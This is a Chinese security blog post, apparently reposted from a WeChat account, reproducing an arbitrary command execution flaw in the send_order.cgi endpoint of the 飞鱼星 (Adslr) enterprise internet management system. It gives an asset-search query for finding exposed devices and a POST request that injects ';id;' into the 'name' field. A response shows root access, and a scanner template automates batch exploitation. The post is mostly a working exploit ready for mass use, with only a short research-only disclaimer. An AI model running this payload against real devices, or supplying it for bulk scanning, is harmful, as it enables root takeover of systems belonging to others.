资产收集
body="http://www.adslr.com/product/"
漏洞复现
发送请求
POST /send_order.cgi?parameter=operation HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded{"opid":"1","name":";id;","type":"rest"}
返回包
HTTP/1.0 200 OKuid=0(root) gid=0(root) groups=0(root)Content-Length: 29{"type":1,"msg":"ok"}
批量验证脚本
id: ZH-2024-05-16-001
info:
name: 飞鱼星企业级智能上网行为管理系统 send_order.cgi 任意命令执行
author: 仲瑿
severity: low
http:
- raw:
- |-
@timeout: 30s
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
{"opid":"1","name":";id;","type":"rest"}
matchers:
- id: 1
type: word
part: header
words:
- uid=0(root) gid=0(root) groups=0(root)
condition: and
https://pan.quark.cn/s/6d153631fc16
原文始发于微信公众号(Devil安全):【漏洞复现】飞鱼星企业级智能上网行为管理系统 send_order.cgi 任意命令执行
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论